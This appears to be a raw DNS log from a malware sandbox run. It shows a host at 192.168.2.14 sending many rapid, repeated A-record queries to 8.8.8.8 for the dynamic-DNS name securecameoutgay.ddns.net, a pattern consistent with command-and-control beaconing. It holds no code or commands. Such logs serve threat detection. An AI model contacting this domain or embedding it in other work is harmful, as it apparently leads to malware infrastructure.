                                                    Oct 12, 2024 23:05:28.828737020 CEST192.168.2.148.8.8.80x1c5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.835659981 CEST192.168.2.148.8.8.80x1c5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.842787981 CEST192.168.2.148.8.8.80x1c5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.849258900 CEST192.168.2.148.8.8.80x1c5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.856307983 CEST192.168.2.148.8.8.80x1c5cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.863574028 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.870516062 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.877408981 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.884074926 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.891303062 CEST192.168.2.148.8.8.80xd4adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.898878098 CEST192.168.2.148.8.8.80x5b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.905718088 CEST192.168.2.148.8.8.80x5b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.912939072 CEST192.168.2.148.8.8.80x5b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.919723034 CEST192.168.2.148.8.8.80x5b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.926551104 CEST192.168.2.148.8.8.80x5b37Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.933298111 CEST192.168.2.148.8.8.80xf393Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.939913988 CEST192.168.2.148.8.8.80xf393Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.946677923 CEST192.168.2.148.8.8.80xf393Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.953237057 CEST192.168.2.148.8.8.80xf393Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.960390091 CEST192.168.2.148.8.8.80xf393Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.967279911 CEST192.168.2.148.8.8.80xeab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.974361897 CEST192.168.2.148.8.8.80xeab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.981184959 CEST192.168.2.148.8.8.80xeab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.987507105 CEST192.168.2.148.8.8.80xeab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:28.994267941 CEST192.168.2.148.8.8.80xeab7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.000742912 CEST192.168.2.148.8.8.80x6939Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.008004904 CEST192.168.2.148.8.8.80x6939Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.015712023 CEST192.168.2.148.8.8.80x6939Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.022438049 CEST192.168.2.148.8.8.80x6939Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.029020071 CEST192.168.2.148.8.8.80x6939Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.035696030 CEST192.168.2.148.8.8.80xec5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.042515993 CEST192.168.2.148.8.8.80xec5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.049469948 CEST192.168.2.148.8.8.80xec5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.056595087 CEST192.168.2.148.8.8.80xec5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.063446999 CEST192.168.2.148.8.8.80xec5aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.070122957 CEST192.168.2.148.8.8.80x1414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.076726913 CEST192.168.2.148.8.8.80x1414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.083451033 CEST192.168.2.148.8.8.80x1414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.090131044 CEST192.168.2.148.8.8.80x1414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.097454071 CEST192.168.2.148.8.8.80x1414Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.104260921 CEST192.168.2.148.8.8.80xd48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.111011028 CEST192.168.2.148.8.8.80xd48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.118005991 CEST192.168.2.148.8.8.80xd48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.124941111 CEST192.168.2.148.8.8.80xd48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.131473064 CEST192.168.2.148.8.8.80xd48dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.138144016 CEST192.168.2.148.8.8.80xf5a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.144946098 CEST192.168.2.148.8.8.80xf5a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.151863098 CEST192.168.2.148.8.8.80xf5a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.158591032 CEST192.168.2.148.8.8.80xf5a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.165694952 CEST192.168.2.148.8.8.80xf5a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.172296047 CEST192.168.2.148.8.8.80x565cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.179167986 CEST192.168.2.148.8.8.80x565cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.185842037 CEST192.168.2.148.8.8.80x565cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.192702055 CEST192.168.2.148.8.8.80x565cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.199574947 CEST192.168.2.148.8.8.80x565cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.206310987 CEST192.168.2.148.8.8.80xd7d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.213085890 CEST192.168.2.148.8.8.80xd7d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.220033884 CEST192.168.2.148.8.8.80xd7d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.226769924 CEST192.168.2.148.8.8.80xd7d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.235814095 CEST192.168.2.148.8.8.80xd7d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.243275881 CEST192.168.2.148.8.8.80x2f1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.249893904 CEST192.168.2.148.8.8.80x2f1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.256833076 CEST192.168.2.148.8.8.80x2f1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.263942957 CEST192.168.2.148.8.8.80x2f1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.270617008 CEST192.168.2.148.8.8.80x2f1dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.277581930 CEST192.168.2.148.8.8.80xefbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.284399033 CEST192.168.2.148.8.8.80xefbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.291480064 CEST192.168.2.148.8.8.80xefbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.298332930 CEST192.168.2.148.8.8.80xefbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.305135012 CEST192.168.2.148.8.8.80xefbcStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.311610937 CEST192.168.2.148.8.8.80xf326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.318157911 CEST192.168.2.148.8.8.80xf326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.324891090 CEST192.168.2.148.8.8.80xf326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.332349062 CEST192.168.2.148.8.8.80xf326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.339612007 CEST192.168.2.148.8.8.80xf326Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.346534014 CEST192.168.2.148.8.8.80xf203Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.353903055 CEST192.168.2.148.8.8.80xf203Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.360708952 CEST192.168.2.148.8.8.80xf203Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.368005037 CEST192.168.2.148.8.8.80xf203Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.375061035 CEST192.168.2.148.8.8.80xf203Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.381688118 CEST192.168.2.148.8.8.80xbc05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.388350964 CEST192.168.2.148.8.8.80xbc05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.395068884 CEST192.168.2.148.8.8.80xbc05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.401499987 CEST192.168.2.148.8.8.80xbc05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.408330917 CEST192.168.2.148.8.8.80xbc05Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.415433884 CEST192.168.2.148.8.8.80xd475Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.422254086 CEST192.168.2.148.8.8.80xd475Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.429055929 CEST192.168.2.148.8.8.80xd475Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.436050892 CEST192.168.2.148.8.8.80xd475Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.442738056 CEST192.168.2.148.8.8.80xd475Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.449312925 CEST192.168.2.148.8.8.80xd100Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.456151009 CEST192.168.2.148.8.8.80xd100Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.463433981 CEST192.168.2.148.8.8.80xd100Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.470642090 CEST192.168.2.148.8.8.80xd100Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.477487087 CEST192.168.2.148.8.8.80xd100Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.484456062 CEST192.168.2.148.8.8.80x517Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.491518974 CEST192.168.2.148.8.8.80x517Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.498656988 CEST192.168.2.148.8.8.80x517Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.505546093 CEST192.168.2.148.8.8.80x517Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.512300014 CEST192.168.2.148.8.8.80x517Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.519037008 CEST192.168.2.148.8.8.80x499cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.525986910 CEST192.168.2.148.8.8.80x499cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.532768011 CEST192.168.2.148.8.8.80x499cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.539457083 CEST192.168.2.148.8.8.80x499cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.546588898 CEST192.168.2.148.8.8.80x499cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.553209066 CEST192.168.2.148.8.8.80x674bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.560012102 CEST192.168.2.148.8.8.80x674bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.566905975 CEST192.168.2.148.8.8.80x674bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.573327065 CEST192.168.2.148.8.8.80x674bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.579530001 CEST192.168.2.148.8.8.80x674bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.586010933 CEST192.168.2.148.8.8.80x968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.592623949 CEST192.168.2.148.8.8.80x968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.599301100 CEST192.168.2.148.8.8.80x968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.606647015 CEST192.168.2.148.8.8.80x968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.613015890 CEST192.168.2.148.8.8.80x968Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.619766951 CEST192.168.2.148.8.8.80xc167Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.626698017 CEST192.168.2.148.8.8.80xc167Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.633570910 CEST192.168.2.148.8.8.80xc167Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.645420074 CEST192.168.2.148.8.8.80xc167Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.652661085 CEST192.168.2.148.8.8.80xc167Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.659416914 CEST192.168.2.148.8.8.80x1e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.666131973 CEST192.168.2.148.8.8.80x1e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.673204899 CEST192.168.2.148.8.8.80x1e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.680257082 CEST192.168.2.148.8.8.80x1e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.687243938 CEST192.168.2.148.8.8.80x1e51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.694166899 CEST192.168.2.148.8.8.80x684eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.701441050 CEST192.168.2.148.8.8.80x684eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.708679914 CEST192.168.2.148.8.8.80x684eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.715899944 CEST192.168.2.148.8.8.80x684eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.722548008 CEST192.168.2.148.8.8.80x684eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.730447054 CEST192.168.2.148.8.8.80xda15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.737338066 CEST192.168.2.148.8.8.80xda15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.743904114 CEST192.168.2.148.8.8.80xda15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.750725031 CEST192.168.2.148.8.8.80xda15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.757400036 CEST192.168.2.148.8.8.80xda15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.764041901 CEST192.168.2.148.8.8.80xfb6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.770884037 CEST192.168.2.148.8.8.80xfb6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.777595043 CEST192.168.2.148.8.8.80xfb6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.784187078 CEST192.168.2.148.8.8.80xfb6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.790621996 CEST192.168.2.148.8.8.80xfb6dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.797492027 CEST192.168.2.148.8.8.80x74b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.804147959 CEST192.168.2.148.8.8.80x74b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.810970068 CEST192.168.2.148.8.8.80x74b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.817444086 CEST192.168.2.148.8.8.80x74b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.824155092 CEST192.168.2.148.8.8.80x74b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.830576897 CEST192.168.2.148.8.8.80x121fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.837068081 CEST192.168.2.148.8.8.80x121fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.843996048 CEST192.168.2.148.8.8.80x121fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.850555897 CEST192.168.2.148.8.8.80x121fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.857053995 CEST192.168.2.148.8.8.80x121fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.864222050 CEST192.168.2.148.8.8.80xfb03Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.870810032 CEST192.168.2.148.8.8.80xfb03Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.877629995 CEST192.168.2.148.8.8.80xfb03Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.883904934 CEST192.168.2.148.8.8.80xfb03Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.890707970 CEST192.168.2.148.8.8.80xfb03Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.897418022 CEST192.168.2.148.8.8.80x9e81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.903845072 CEST192.168.2.148.8.8.80x9e81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.910582066 CEST192.168.2.148.8.8.80x9e81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.917678118 CEST192.168.2.148.8.8.80x9e81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.924237967 CEST192.168.2.148.8.8.80x9e81Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.930910110 CEST192.168.2.148.8.8.80xb245Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.937383890 CEST192.168.2.148.8.8.80xb245Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.944154024 CEST192.168.2.148.8.8.80xb245Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.951237917 CEST192.168.2.148.8.8.80xb245Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.957741976 CEST192.168.2.148.8.8.80xb245Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.964458942 CEST192.168.2.148.8.8.80x2ad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.971193075 CEST192.168.2.148.8.8.80x2ad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.977756023 CEST192.168.2.148.8.8.80x2ad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.984523058 CEST192.168.2.148.8.8.80x2ad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.991430044 CEST192.168.2.148.8.8.80x2ad3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:29.997817039 CEST192.168.2.148.8.8.80x6de7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.004504919 CEST192.168.2.148.8.8.80x6de7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.011327028 CEST192.168.2.148.8.8.80x6de7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.018157959 CEST192.168.2.148.8.8.80x6de7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.024801016 CEST192.168.2.148.8.8.80x6de7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.031584978 CEST192.168.2.148.8.8.80xab08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.038522959 CEST192.168.2.148.8.8.80xab08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.045911074 CEST192.168.2.148.8.8.80xab08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.052645922 CEST192.168.2.148.8.8.80xab08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.059468985 CEST192.168.2.148.8.8.80xab08Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.066962004 CEST192.168.2.148.8.8.80x433dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.073815107 CEST192.168.2.148.8.8.80x433dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.081170082 CEST192.168.2.148.8.8.80x433dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.088165998 CEST192.168.2.148.8.8.80x433dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.095046997 CEST192.168.2.148.8.8.80x433dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.103410006 CEST192.168.2.148.8.8.80x3941Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.110450983 CEST192.168.2.148.8.8.80x3941Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:30.117188931 CEST192.168.2.148.8.8.80x3941Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
